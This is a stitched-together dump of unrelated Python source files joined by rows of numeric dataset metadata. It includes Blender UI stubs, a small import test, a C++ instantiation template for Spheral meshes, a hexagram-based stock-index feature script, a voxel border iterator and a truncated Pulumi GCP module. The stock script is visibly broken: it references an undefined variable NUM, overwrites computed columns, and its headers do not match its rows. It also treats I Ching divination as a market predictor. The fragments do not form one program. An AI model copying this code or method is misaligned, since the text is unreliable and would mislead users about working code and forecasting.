'''
'''
pass
class NODE_PT_quality(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_texture_mapping(bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_UL_interface_sockets(bpy_types.UIList, bpy_types._GenericUI):
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw_item(self, context, layout, _data, item, icon, _active_data,
_active_propname, _index):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
def node_draw_tree_view(_layout, _context):
'''
'''
pass
def node_panel(cls):
'''
'''
pass
| 12.286759
| 78
| 0.385182
| 3,606
| 43,704
| 4.39462
| 0.034664
| 0.227488
| 0.277655
| 0.077933
| 0.959992
| 0.956585
| 0.948129
| 0.946173
| 0.946173
| 0.944974
| 0
| 0
| 0.48213
| 43,704
| 3,556
| 79
| 12.290214
| 0.700172
| 0
| 0
| 0.963425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.44389
| false
| 0.44389
| 0.004988
| 0
| 0.545303
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 12
|
e1c0e6d4f21996d124e19b062cb7c14572573ce1
| 92
|
py
|
Python
|
tests/test_import.py
|
pierre-rouanet/zzlog
|
a7d27ce968842ae75fb6f5b913367302544ce8b6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_import.py
|
pierre-rouanet/zzlog
|
a7d27ce968842ae75fb6f5b913367302544ce8b6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_import.py
|
pierre-rouanet/zzlog
|
a7d27ce968842ae75fb6f5b913367302544ce8b6
|
[
"Apache-2.0"
] | null | null | null |
def test_import():
import zzlog # noqa: F401
from zzlog import setup # noqa: F401
| 23
| 41
| 0.663043
| 13
| 92
| 4.615385
| 0.615385
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 0.26087
| 92
| 3
| 42
| 30.666667
| 0.794118
| 0.228261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 1
| 0
| 1.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8342488147cfa70d7e0a10ed3eec357600c6df69
| 2,714
|
py
|
Python
|
src/Mesh/generateMeshInst.cc.py
|
jmikeowen/Spheral
|
3e1082a7aefd6b328bd3ae24ca1a477108cfc3c4
|
[
"BSD-Source-Code",
"BSD-3-Clause-LBNL",
"FSFAP"
] | 22
|
2018-07-31T21:38:22.000Z
|
2020-06-29T08:58:33.000Z
|
src/Mesh/generateMeshInst.cc.py
|
jmikeowen/Spheral
|
3e1082a7aefd6b328bd3ae24ca1a477108cfc3c4
|
[
"BSD-Source-Code",
"BSD-3-Clause-LBNL",
"FSFAP"
] | 41
|
2020-09-28T23:14:27.000Z
|
2022-03-28T17:01:33.000Z
|
src/Mesh/generateMeshInst.cc.py
|
jmikeowen/Spheral
|
3e1082a7aefd6b328bd3ae24ca1a477108cfc3c4
|
[
"BSD-Source-Code",
"BSD-3-Clause-LBNL",
"FSFAP"
] | 7
|
2019-12-01T07:00:06.000Z
|
2020-09-15T21:12:39.000Z
|
text = """
//------------------------------------------------------------------------------
// Explicit instantiation.
//------------------------------------------------------------------------------
#include "Mesh/generateMesh.cc"
namespace Spheral {
template void generateMesh<Dim< %(ndim)s >,
vector<NodeList<Dim< %(ndim)s > >*>::iterator,
vector<Boundary<Dim< %(ndim)s > >*>::iterator>
(const vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin,
const vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd,
const Dim< %(ndim)s >::Vector& xmin,
const Dim< %(ndim)s >::Vector& xmax,
const bool meshGhostNodes,
const bool generateVoid,
const bool generateParallelConnectivity,
const bool removeBoundaryZones,
const double voidThreshold,
Mesh<Dim< %(ndim)s > >& mesh,
NodeList<Dim< %(ndim)s > >& voidNodes);
template void generateMesh<Dim< %(ndim)s >,
vector<const NodeList<Dim< %(ndim)s > >*>::iterator,
vector<Boundary<Dim< %(ndim)s > >*>::const_iterator>
(const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin,
const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd,
const vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryBegin,
const vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryEnd,
const Dim< %(ndim)s >::Vector& xmin,
const Dim< %(ndim)s >::Vector& xmax,
const bool meshGhostNodes,
const bool generateVoid,
const bool generateParallelConnectivity,
const bool removeBoundaryZones,
const double voidThreshold,
Mesh<Dim< %(ndim)s > >& mesh,
NodeList<Dim< %(ndim)s > >& voidNodes);
template void generateMesh<Dim< %(ndim)s >,
vector<const NodeList<Dim< %(ndim)s > >*>::iterator,
vector<Boundary<Dim< %(ndim)s > >*>::iterator>
(const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin,
const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd,
const Dim< %(ndim)s >::Vector& xmin,
const Dim< %(ndim)s >::Vector& xmax,
const bool meshGhostNodes,
const bool generateVoid,
const bool generateParallelConnectivity,
const bool removeBoundaryZones,
const double voidThreshold,
Mesh<Dim< %(ndim)s > >& mesh,
NodeList<Dim< %(ndim)s > >& voidNodes);
}
"""
| 43.774194
| 81
| 0.594694
| 279
| 2,714
| 5.774194
| 0.11828
| 0.143389
| 0.163873
| 0.148976
| 0.959032
| 0.959032
| 0.959032
| 0.93234
| 0.866543
| 0.866543
| 0
| 0
| 0.1986
| 2,714
| 61
| 82
| 44.491803
| 0.74069
| 0
| 0
| 0.785714
| 0
| 0
| 0.994842
| 0.099116
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
360c36318dca57470cdde015ad3abdd21becd932
| 13,084
|
py
|
Python
|
yxf_yixue/app_yixuecegu/datax.py
|
lamzuzuzu/yxf_yixue_py
|
90eb077f195b543f93a507f28b0a4c016cb0c92f
|
[
"MIT"
] | 20
|
2019-01-08T08:13:39.000Z
|
2021-12-23T09:04:14.000Z
|
yxf_yixue/app_yixuecegu/datax.py
|
lamzuzuzu/yxf_yixue_py
|
90eb077f195b543f93a507f28b0a4c016cb0c92f
|
[
"MIT"
] | null | null | null |
yxf_yixue/app_yixuecegu/datax.py
|
lamzuzuzu/yxf_yixue_py
|
90eb077f195b543f93a507f28b0a4c016cb0c92f
|
[
"MIT"
] | 13
|
2019-04-22T03:25:13.000Z
|
2022-01-04T05:43:48.000Z
|
import os
import openpyxl
import openpyxl.utils
from utils._excel2db import Excel2Db
# 生成数据库,只需要在最初执行一次
def gen_db():
c = Excel2Db('app_yixuecegu.db')
c.transform2db(os.path.join(os.path.dirname(os.path.abspath(__file__)),'origin_data'))
class WangqiLuyao:
def __init__(self):
pass
def execute_xlsx1(self, typ, path1, path2):
realpath1 = os.path.join(os.getcwd(), path1)
realpath2 = os.path.join(os.getcwd(), path2)
# 读取原始表格
wb_origin = openpyxl.load_workbook(realpath1)
ws_origin = wb_origin.active
# 初始化目标表
wb_work, ws_work = eval("self." + self.check(typ) + "_1(realpath2)")
# 每次循环对应原始表格和目标表格的一行
for i, row in enumerate(ws_origin):
rows = ws_origin.max_row
# 第一行为标题,需跳过
if i == 0:
continue
# 循环到最末6行退出,防止计算六爻时出现空值
if rows - i <= 6:
break
# for循环计数从0开始,但表格行列数从1开始,要注意差别
# 数据列处理
arr = eval("self." + self.check(typ) + "_2(ws_origin, i)")
# 输出到目标表
print(arr[0])
ws_work.append(arr)
# 保存文件
wb_work.save(realpath2)
def execute_xlsx2(self, typ, path1, path2):
realpath1 = os.path.join(os.getcwd(), path1)
realpath2 = os.path.join(os.getcwd(), path2)
# 读取原始表格
wb_origin = openpyxl.load_workbook(realpath1)
ws_origin = wb_origin.active
# 初始化目标表
wb_work, ws_work = eval("self." + self.check(typ) + "_3(ws_origin, realpath2)")
for i, row in enumerate(ws_origin):
# 表中有标题行,数据第1行无法取未来值,需跳过前2次循环
if i <= 1:
continue
# 数据列处理
arr = eval("self." + self.check(typ) + "_4(ws_origin, i)")
# 输出到目标表
print(arr[0])
ws_work.append(arr)
# 保存文件
wb_work.save(realpath2)
@staticmethod
def check(typ):
if typ == "上证指数":
return "shangzhengzhishu"
elif typ == "深证成指":
return "shenzhengchengzhi"
elif typ == "沪深300":
return "hushen300"
else:
raise ImportError("输入参数错误:typ=" + typ)
def shangzhengzhishu_1(self, realpath2):
# 若已存在目标表,删除
if os.path.exists(realpath2):
os.remove(realpath2)
# 重新建立目标表格
wb_work = openpyxl.Workbook()
ws_work = wb_work.active
# 输出标题行
ws_work.append(
['日期',
'卦号',
'X1', 'X2', 'X3', 'X4', 'X5', 'X6',
'XR1', 'XR2', 'XR3', 'XR4', 'XR5', 'XR6',
'X7', 'X8', 'X9', 'X10', 'X11', 'X12', 'X13', 'X14', 'X15', 'X16',
'X17', 'X18', 'X19', 'X20', 'X21', 'X22', 'X23', 'X24', 'X25', 'X26',
'F'
])
return wb_work, ws_work
def shangzhengzhishu_2(self, ws_origin, i):
# 当期数据
DATE = ws_origin[i+1][0].value
F1 = ws_origin[i+1][9].value
try:
X11 = ws_origin[i + 1][9].value-0
X12 = ws_origin[i + 2][9].value-0
X13 = ws_origin[i + 3][9].value-0
X14 = ws_origin[i + 4][9].value-0
X15 = ws_origin[i + 5][9].value-0
X16 = ws_origin[i + 6][9].value-0
X17 = ws_origin[i + 7][9].value - 0
X18 = ws_origin[i + 8][9].value - 0
X19 = ws_origin[i + 9][9].value - 0
except: # 原表中有无效记录,转化为0,如此,所有的无效记录都转化为乾卦
X11 = 0
X12 = 0
X13 = 0
X14 = 0
X15 = 0
X16 = 0
X17 = 0
X18 = 0
X19 = 0
X17=X11+X12
X18=X13+X14
X19=X15+X16
X110=X11+X12+X13
X111=X14+X15+X16
X112=X11*X11
X113=X12*X12
X114=X13*X13
X115=X14*X14
X116=X15*X15
X117=X16*X16
X118=X11*X11*X11
X119=X12*X12*X12
X120=X13*X13*X13
X121=X14*X14*X14
X122=X15*X15*X15
X123=X16*X16*X16
X124=X11+X12+X13+X14
X125=X11+X12+X13+X14+X15
X126=X11+X12+X13+X14+X15+X16
# 六爻数值变换
# 0和正变1,负变0
X11g = 1 if X11 >= 0 else 0
X12g = 1 if X12 >= 0 else 0
X13g = 1 if X13 >= 0 else 0
X14g = 1 if X14 >= 0 else 0
X15g = 1 if X15 >= 0 else 0
X16g = 1 if X16 >= 0 else 0
# 以X11为初爻、低位,X16为上爻、高位的方法计算卦数
guashu1 = X11g*1 + X12g*2 + X13g*4 + X14g*8 + X15g*16 + X16g*32
# 读取卦表
wb_gua = openpyxl.load_workbook(os.path.join(os.getcwd(), '..\common\common_data\基础表-六十四卦.xlsx'))
ws_gua = wb_gua.active
GH1 = None
# 查询卦表,求取卦号和卦名
for row in ws_gua:
if row[4].value == guashu1:
GH1 = row[0].value
arr = [
NUM, # 1,A
GH1, # 2,B
X11, X12, X13, X14, X15, X16, # 3-8,C-H
X17, X18, X19, X110, X111, X112, X113, X114, X115, X116, # 9-18,I-R
X117, X118, X119, X120, X121, X122, X123, X124, X125, X126, # 19-28,S-AB
F1 # 29,AC
]
return arr
def shangzhengzhishu_3(self, ws_origin, realpath2):
# 若已存在目标表,删除
if os.path.exists(realpath2):
os.remove(realpath2)
# 重新建立目标表格
wb_work = openpyxl.Workbook()
ws_work = wb_work.active
# 输出标题行
arr = []
for col in ws_origin[1]:
arr.append(col.value)
arr.append('R1')
arr.append('RR1')
ws_work.append(arr)
return wb_work, ws_work
def shangzhengzhishu_4(self, ws_origin, i):
# 因i从0开始,所以i+1为当期,i为未来期
arr = []
for col in ws_origin[i+1]:
arr.append(col.value)
R1 = ws_origin[i][2].value
RR1 = 1 if R1 >= 0 else -1
arr.append(R1)
arr.append(RR1)
return arr
def shenzhengchengzhi_1(self, realpath2):
# 若已存在目标表,删除
if os.path.exists(realpath2):
os.remove(realpath2)
# 重新建立目标表格
wb_work = openpyxl.Workbook()
ws_work = wb_work.active
# 输出标题行
ws_work.append(
['NUM', # 1,A
'GH1', # 2,B
'X11', 'X12', 'X13', 'X14', 'X15', 'X16', # 3-8,C-H
'X17', 'X18', 'X19', 'X110', 'X111', 'X112', 'X113', 'X114', 'X115', 'X116', # 9-18,I-R
'X117', 'X118', 'X119', 'X120', 'X121', 'X122', 'X123', 'X124', 'X125', 'X126', # 19-28,S-AB
'F1' # 29,AC
])
return wb_work, ws_work
def shenzhengchengzhi_2(self, ws_origin, i):
# 当期数据
NUM = ws_origin[i+1][0].value
F1 = ws_origin[i+1][9].value
try:
X11 = ws_origin[i + 1][9].value - ws_origin[i + 2][9].value
X12 = ws_origin[i + 2][9].value - ws_origin[i + 3][9].value
X13 = ws_origin[i + 3][9].value - ws_origin[i + 4][9].value
X14 = ws_origin[i + 4][9].value - ws_origin[i + 5][9].value
X15 = ws_origin[i + 5][9].value - ws_origin[i + 6][9].value
X16 = ws_origin[i + 6][9].value - ws_origin[i + 7][9].value
except: # 原表中有无效记录,转化为0
X11 = 0
X12 = 0
X13 = 0
X14 = 0
X15 = 0
X16 = 0
X17=X11+X12
X18=X13+X14
X19=X15+X16
X110=X11+X12+X13
X111=X14+X15+X16
X112=X11*X11
X113=X12*X12
X114=X13*X13
X115=X14*X14
X116=X15*X15
X117=X16*X16
X118=X11*X11*X11
X119=X12*X12*X12
X120=X13*X13*X13
X121=X14*X14*X14
X122=X15*X15*X15
X123=X16*X16*X16
X124=X11+X12+X13+X14
X125=X11+X12+X13+X14+X15
X126=X11+X12+X13+X14+X15+X16
# 六爻数值变换
# 0和正变1,负变0
X11g = 1 if X11 >= 0 else 0
X12g = 1 if X12 >= 0 else 0
X13g = 1 if X13 >= 0 else 0
X14g = 1 if X14 >= 0 else 0
X15g = 1 if X15 >= 0 else 0
X16g = 1 if X16 >= 0 else 0
# 以X11为初爻、低位,X16为上爻、高位的方法计算卦数
guashu1 = X11g*1 + X12g*2 + X13g*4 + X14g*8 + X15g*16 + X16g*32
# 读取卦表
wb_gua = openpyxl.load_workbook(os.path.join(os.getcwd(), '..\common\common_data\基础表-六十四卦.xlsx'))
ws_gua = wb_gua.active
GH1, GH2, GH3 = None, None, None
# 查询卦表,求取卦号和卦名
for row in ws_gua:
if row[4].value == guashu1:
GH1 = row[0].value
arr = [
NUM, # 1,A
GH1, # 2,B
X11, X12, X13, X14, X15, X16, # 3-8,C-H
X17, X18, X19, X110, X111, X112, X113, X114, X115, X116, # 9-18,I-R
X117, X118, X119, X120, X121, X122, X123, X124, X125, X126, # 19-28,S-AB
F1 # 29,AC
]
return arr
def shenzhengchengzhi_3(self, ws_origin, realpath2):
# 若已存在目标表,删除
if os.path.exists(realpath2):
os.remove(realpath2)
# 重新建立目标表格
wb_work = openpyxl.Workbook()
ws_work = wb_work.active
# 输出标题行
arr = []
for col in ws_origin[1]:
arr.append(col.value)
arr.append('R1')
arr.append('XFR1')
ws_work.append(arr)
return wb_work, ws_work
def shenzhengchengzhi_4(self, ws_origin, i):
# 因i从0开始,所以i+1为当期,i为未来期
arr = []
for col in ws_origin[i+1]:
arr.append(col.value)
XFR1, R1 = int(ws_origin[i][9].value)-int(ws_origin[i+1][9].value), int(ws_origin[i][9].value)
arr.append(R1)
arr.append(XFR1)
return arr
def hushen300_1(self, realpath2):
# 若已存在目标表,删除
if os.path.exists(realpath2):
os.remove(realpath2)
# 重新建立目标表格
wb_work = openpyxl.Workbook()
ws_work = wb_work.active
# 输出标题行
ws_work.append(
['NUM', # 1,A
'GH1', # 2,B
'X11', 'X12', 'X13', 'X14', 'X15', 'X16', # 3-8,C-H
'X17', 'X18', 'X19', 'X110', 'X111', 'X112', 'X113', 'X114', 'X115', 'X116', # 9-18,I-R
'X117', 'X118', 'X119', 'X120', 'X121', 'X122', 'X123', 'X124', 'X125', 'X126', # 19-28,S-AB
'F1' # 29,AC
])
return wb_work, ws_work
def hushen300_2(self, ws_origin, i):
# 当期数据
NUM = ws_origin[i+1][0].value
F1 = ws_origin[i+1][9].value
try:
X11 = ws_origin[i + 1][9].value-0
X12 = ws_origin[i + 2][9].value-0
X13 = ws_origin[i + 3][9].value-0
X14 = ws_origin[i + 4][9].value-0
X15 = ws_origin[i + 5][9].value-0
X16 = ws_origin[i + 6][9].value-0
except: # 原表中有无效记录,转化为0,如此,所有的无效记录都转化为乾卦
X11 = 0
X12 = 0
X13 = 0
X14 = 0
X15 = 0
X16 = 0
X17=X11+X12
X18=X13+X14
X19=X15+X16
X110=X11+X12+X13
X111=X14+X15+X16
X112=X11*X11
X113=X12*X12
X114=X13*X13
X115=X14*X14
X116=X15*X15
X117=X16*X16
X118=X11*X11*X11
X119=X12*X12*X12
X120=X13*X13*X13
X121=X14*X14*X14
X122=X15*X15*X15
X123=X16*X16*X16
X124=X11+X12+X13+X14
X125=X11+X12+X13+X14+X15
X126=X11+X12+X13+X14+X15+X16
# 六爻数值变换
# 0和正变1,负变0
X11g = 1 if X11 >= 0 else 0
X12g = 1 if X12 >= 0 else 0
X13g = 1 if X13 >= 0 else 0
X14g = 1 if X14 >= 0 else 0
X15g = 1 if X15 >= 0 else 0
X16g = 1 if X16 >= 0 else 0
# 以X11为初爻、低位,X16为上爻、高位的方法计算卦数
guashu1 = X11g*1 + X12g*2 + X13g*4 + X14g*8 + X15g*16 + X16g*32
# 读取卦表
wb_gua = openpyxl.load_workbook(os.path.join(os.getcwd(), '..\common\common_data\基础表-六十四卦.xlsx'))
ws_gua = wb_gua.active
GH1 = None
# 查询卦表,求取卦号和卦名
for row in ws_gua:
if row[4].value == guashu1:
GH1 = row[0].value
arr = [
NUM, # 1,A
GH1, # 2,B
X11, X12, X13, X14, X15, X16, # 3-8,C-H
X17, X18, X19, X110, X111, X112, X113, X114, X115, X116, # 9-18,I-R
X117, X118, X119, X120, X121, X122, X123, X124, X125, X126, # 19-28,S-AB
F1 # 29,AC
]
return arr
def hushen300_3(self, ws_origin, realpath2):
# 若已存在目标表,删除
if os.path.exists(realpath2):
os.remove(realpath2)
# 重新建立目标表格
wb_work = openpyxl.Workbook()
ws_work = wb_work.active
# 输出标题行
arr = []
for col in ws_origin[1]:
arr.append(col.value)
arr.append('R1')
arr.append('TF1')
ws_work.append(arr)
return wb_work, ws_work
def hushen300_4(self, ws_origin, i):
# 因i从0开始,所以i+1为当期,i为未来期
arr = []
for col in ws_origin[i+1]:
arr.append(col.value)
R1 = ws_origin[i][2].value
TF1 = 1 if R1 >=0 else -1
arr.append(R1)
arr.append(TF1)
return arr
| 31.004739
| 106
| 0.4893
| 1,796
| 13,084
| 3.475501
| 0.11971
| 0.07818
| 0.07065
| 0.028837
| 0.862384
| 0.862384
| 0.828741
| 0.774111
| 0.774111
| 0.774111
| 0
| 0.187508
| 0.375955
| 13,084
| 421
| 107
| 31.078385
| 0.576975
| 0.068863
| 0
| 0.774481
| 0
| 0
| 0.049698
| 0.008683
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050445
| false
| 0.002967
| 0.014837
| 0
| 0.11276
| 0.005935
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
360c5bdce1741e3af722e2491f5fa293e6c49051
| 3,448
|
py
|
Python
|
src/computation/split_and_merge/util/node_border_iterator.py
|
sciapp/pyMolDyn
|
fba6ea91cb185f916b930cd25b4b1d28a22fb4c5
|
[
"MIT"
] | 11
|
2016-10-25T09:48:36.000Z
|
2021-01-30T18:59:50.000Z
|
src/computation/split_and_merge/util/node_border_iterator.py
|
sciapp/pyMolDyn
|
fba6ea91cb185f916b930cd25b4b1d28a22fb4c5
|
[
"MIT"
] | 1
|
2017-09-19T06:03:36.000Z
|
2017-09-28T11:29:23.000Z
|
src/computation/split_and_merge/util/node_border_iterator.py
|
sciapp/pyMolDyn
|
fba6ea91cb185f916b930cd25b4b1d28a22fb4c5
|
[
"MIT"
] | null | null | null |
import itertools as it
def iterate_node_border(node, func):
node_x, node_y, node_z = node[0]
node_w, node_h, node_d = node[1]
border_points = [(x, node_y-1, z ) for x in range(node_x, node_x+node_w+1) for z in range(node_z, node_z+node_d+1)]
border_points.extend([(x, node_y+node_h, z ) for x in range(node_x, node_x+node_w+1) for z in range(node_z, node_z+node_d+1)])
border_points.extend([(node_x-1, y, z ) for y in range(node_y-1, node_y+node_h+1) for z in range(node_z-1, node_z+node_d+1)])
border_points.extend([(node_x+node_w, y, z ) for y in range(node_y, node_y+node_h) for z in range(node_z, node_z+node_d+1)])
border_points.extend([(x, y, node_z-1 ) for x in range(node_x, node_x+node_w+1) for y in range(node_y-1, node_y+node_h+1)])
border_points.extend([(x, y, node_z+node_d) for x in range(node_x, node_x+node_w) for y in range(node_y, node_y+node_h) ])
for border_x, border_y, border_z in border_points:
func(border_x, border_y, border_z)
def iterate_node_border_with_adjacent_node_cells(node, func):
node_x, node_y, node_z = node[0]
node_w, node_h, node_d = node[1]
border_points = [(x, node_y-1, z, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), [node_y], range(max(z-1, node_z), min(z+2, node_z+node_d))))) for x in range(node_x, node_x+node_w+1) for z in range(node_z, node_z+node_d+1)]
border_points.extend([(x, node_y+node_h, z, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), [node_y+node_h-1], range(max(z-1, node_z), min(z+2, node_z+node_d))))) for x in range(node_x, node_x+node_w+1) for z in range(node_z, node_z+node_d+1)])
border_points.extend([(node_x-1, y, z, tuple(it.product([node_x], range(max(y-1, node_y), min(y+2, node_y+node_h)), range(max(z-1, node_z), min(z+2, node_z+node_d))))) for y in range(node_y-1, node_y+node_h+1) for z in range(node_z-1, node_z+node_d+1)])
border_points.extend([(node_x+node_w, y, z, tuple(it.product([node_x+node_w-1], range(max(y-1, node_y), min(y+2, node_y+node_h)), range(max(z-1, node_z), min(z+2, node_z+node_d))))) for y in range(node_y, node_y+node_h) for z in range(node_z, node_z+node_d+1)])
border_points.extend([(x, y, node_z-1, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), range(max(y-1, node_y), min(y+2, node_y+node_h)), [node_z]) )) for x in range(node_x, node_x+node_w+1) for y in range(node_y-1, node_y+node_h+1)])
border_points.extend([(x, y, node_z+node_d, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), range(max(y-1, node_y), min(y+2, node_y+node_h)), [node_z+node_d-1]) )) for x in range(node_x, node_x+node_w) for y in range(node_y, node_y+node_h) ])
for border_x, border_y, border_z, adjacent_node_cells in border_points:
func(border_x, border_y, border_z, adjacent_node_cells)
| 107.75
| 326
| 0.575696
| 651
| 3,448
| 2.764977
| 0.046083
| 0.088889
| 0.125
| 0.083333
| 0.955556
| 0.946111
| 0.946111
| 0.925
| 0.925
| 0.906111
| 0
| 0.024646
| 0.282193
| 3,448
| 31
| 327
| 111.225806
| 0.702626
| 0
| 0
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
361c97cbcf4541c89bf1887ac753c262f6ba3a9c
| 2,990
|
py
|
Python
|
sdk/python/pulumi_gcp/securitycenter/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/securitycenter/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/securitycenter/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'NotificationConfigStreamingConfig',
]
@pulumi.output_type
class NotificationConfigStreamingConfig(dict):
def __init__(__self__, *,
filter: str):
"""
:param str filter: Expression that defines the filter to apply across create/update
events of assets or findings as specified by the event type. The
expression is a list of zero or more restrictions combined via
logical operators AND and OR. Parentheses are supported, and OR
has higher precedence than AND.
